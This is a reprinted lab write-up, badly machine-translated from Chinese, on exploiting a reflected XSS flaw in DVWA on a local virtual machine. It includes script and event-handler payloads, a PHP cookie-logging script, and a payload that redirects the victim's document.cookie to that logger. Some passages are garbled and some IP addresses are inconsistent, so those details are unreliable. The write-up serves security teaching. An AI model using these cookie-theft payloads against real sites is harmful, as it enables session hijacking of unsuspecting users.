当前位置:网站首页>Reflective XSS vulnerability
Reflective XSS vulnerability
2022-07-01 17:12:00 【Full stack programmer webmaster】
Hello everyone , I meet you again , I'm your friend, Quan Jun .
Experimental projects | reflective XSS experiment |
---|---|
Comprehensive experiments | 2020 year 10 month 22 Japan |
One 、 Experimental review
1. Purpose and requirements of the experiment
(1) Cross site scripts (XSS) XSS It's a kind of web Computer security in applications Loophole , It allows malice web The user injects code into a page that is available to other users . (2)XSS Vulnerabilities fall into three categories : One is reflective XSS Loophole . The reasons causing : There is no reliable input verification for the content submitted by users . One is preservation XSS Loophole . The reasons causing : Without proper The filtering and purification will be saved in the back-end database The data submitted by the user is displayed to other users . The other is based on DOM Of XSS Loophole . Because of the client side JavaScript You can access the text object model of the browser (DOM), therefore , It can determine the... Used to load the current page URL, A script published by the application can be downloaded from URL Extract data from , Process these data , Then use it to update the content of the page , If so , Applications are vulnerable to DOM Of XSS attack .
2. Experimental apparatus 、 Device or software
Vmware Workstation Pro 15.0
PHP study、DVWA
Windows 7 operating system
3. Experimental principle
(1)XSS working principle : XSS:Cross Site Script, For and cascading table (Cascading style sheet,CSS) Somewhat different , In the field of security, it is called “XSS”. XSS attack , Usually a hacker passes through “HTML Inject ” Tampered with the web page , A malicious script was inserted so that when users browse the web , An attack to control a user's browser . In the first place , The demonstration security of this attack is cross domain , So it's called “ Cross site scripts ”. But to this day , because JavaScript The powerful function of the website and the complexity of the front-end application , Whether it's cross domain is no longer important , For historical reasons ,XSS Keep it forever . (2)Web principle : Two kinds of HTTP Request method :GET and POST Request between client and server - Response time , The two most commonly used methods are :GET and POST.GET – Request data from specified resources .POST – Submit the data to be processed to the specified resource .
Two 、 Experimental process ( Step process 、 Data records )
1. step
(1) Turn on the virtual machine , Entering commands on the command line (ipconfig) Check out the IP Address .
(2) Open software phpstudy_pro, start-up Apache2.4.39 and MySQL5.7.26.
(3) Type... In your local browser :http://192.168.45.128/DVWA-master/setup.php Get into DVWA page .
(4) take DVWA Security Set to Low
(5) Click on the left side of the XSS(reflected)
(6) stay DVWA Enter... In the address box :http://192.168.45.128/DVWA-master/vulnerabilities/xss_r/?name=#
Show results , Go to the following page :
Pop up window , That there is xss. Access from a host outside the virtual machine 192.168.45.128
(7) Access from a host outside the virtual machine 192.168.45.128 Address field input :http://192.168.45.168/DVWA-master/vulnerabilities/xss_r/?name=zhangsan
The return page is shown below :
Click... At the bottom right “View Source” The display page is as follows :
Judge according to the echo information , The text displayed is Hello name . I People transport Enter into Of Letter Rest By save discharge stay name. The information we enter is stored in name variable .
(8) Add one JavaScript Code acquisition cookie, Enter , Click on “submit”, The following dialog box will pop up :
You can see that the text information we submitted is executed by the browser , It shows our cookie Information . Description This website has XSS Loophole !
(9) Enter in the text box <body οnlοad=alert(‘xss2’)>
(10) Enter... In the text box :<a href=’’ οnclick=alert(‘xss3’)>click1
The results are as follows :
Click on “click1”, The results are as follows :
(11) In the virtual machine 192.168.45.128 Of WWW/DVWA-master Under the table of contents , newly build cookie1.php, The details are as follows :
<?php
$cookie = $_GET['cookie']; // With GET How to get cookie A variable's value
$fp = fopen('cookie.txt', 'a'); // open cookie.txt, If it doesn't exist, create it
fwrite($fp,"my cookie is:".$cookie."\n"); // write file
fclose($fp); // Close file
?>
Enter the following in the text box of the client , Click on submit
<script>document.location='http://192.168.45.128/DVWA-master/cookie1.php?cookie='+document.cookie;</script>
stay DVWA-master Build in folder cookie.text, open cookie.txt, You can see the client cookie Values are saved in this text file
2. Data records
(1) Input :
http://162.168.45.128/DVWA-master/vulnerabilities/xss_r/?name=<script>alert("1")</script>#
Output :
1
(2) Input :
http://192.168.45.128 /DVWA-master/vulnerabilities/xss_r/?name=zhangsan</script>
Output :
Hello zhangsan
(3) Input :
<script> alert(document.cookie) </script>
Output :
security=low;PHPSESSID=6feglj7cp01c7mk04dndleb6r2
(4) Input :
<body onload=alert('xss2')>
Output :
xss2
(5) Input :
<a href='' onclick=alert('xss3')>click1</a>
Output :
Hello click1
(5) Input :
<script>document.location='http://192.168.45.128/DVWA-master/cookie1.php?cookie='+document.cookie;</script>
Output :
establish cookie.txt file
3、 ... and 、 Result discussion and analysis
1. experimental result
Finally get the user's cookie Information : my cookie is :security=low:PHPSESSID=6avva45en6mubmd3augjkcpjga
2. Analyze and discuss
This experiment was conducted in DVWA In a virtual environment , I learned xss The basic principle and steps of injection , How to use it xss Vulnerability to attack , How to get the user's cookie Information .
3. summary
reflective XSS Causes and steps of vulnerability : reason : The content entered by the user is not effectively verified step : (1) Users log in normally , Get cookie (2) The attacker will be ready URL Submit to the user (3) User access attackers Provided URL (4) The impact of the server on the attacker JavaScript To respond to (5) Of the attacker JavaScript Execute in the user browser (6) The user browser sends a session token to the attacker (7) An attacker hijacks a user session , obtain cookie, Access the user's personal information and perform any operation with the user's permission .
Publisher : Full stack programmer stack length , Reprint please indicate the source :https://javaforall.cn/130940.html Link to the original text :https://javaforall.cn
边栏推荐
- Vulnhub range hacker_ Kid-v1.0.1
- 【C语言补充】判断明天是哪一天(明天的日期)
- (27) Open operation, close operation, morphological gradient, top hat, black hat
- Flux d'entrées / sorties et opérations de fichiers en langage C
- 判断二叉树是否为二叉搜索树
- String class
- vulnhub靶场-hacksudo - Thor
- The amazing open source animation library is not only awesome, but also small
- Alibaba cloud, Zhuoyi technology beach grabbing dialogue AI
- SQL question brushing 586 Customers with the most orders
猜你喜欢
How to use etcd to realize distributed /etc directory
Roewe rx5's "a little more" product strategy
The amazing open source animation library is not only awesome, but also small
[pyg] document summary and project experience (continuously updated
Internet News: "20220222" get together to get licenses; Many products of Jimi have been affirmed by consumers; Starbucks was fined for using expired ingredients in two stores
整形数组合并【JS】
ShenYu 网关开发:在本地启用运行
Redis6.0 新功能
SQL question brushing 627 Change gender
Basic usage of Frida
随机推荐
sql刷题1050. 合作过至少三次的演员和导演
Roewe rx5's "a little more" product strategy
开发那些事儿:EasyCVR集群设备管理页面功能展示优化
Please, stop painting star! This has nothing to do with patriotism!
中国乙腈市场预测与战略咨询研究报告(2022版)
Exclusive news: Alibaba cloud quietly launched RPA cloud computer and has opened cooperation with many RPA manufacturers
剑指 Offer 20. 表示数值的字符串
Redis distributed lock
Why should you consider using prism
【C语言补充】判断明天是哪一天(明天的日期)
Redis Distributed Lock
String的trim()和substring()详解
中国冰淇淋市场深度评估及发展趋势预测报告(2022版)
vulnhub靶场-hacksudo - Thor
[flask introduction series] cookies and session
[Supplément linguistique c] déterminer quel jour est demain (date de demain)
字节跳动数据平台技术揭秘:基于 ClickHouse 的复杂查询实现与优化
Basic usage of Frida
中国超高分子量聚乙烯产业调研与投资前景报告(2022版)
越来越多地使用 SLO 来实现可观测性|DevOps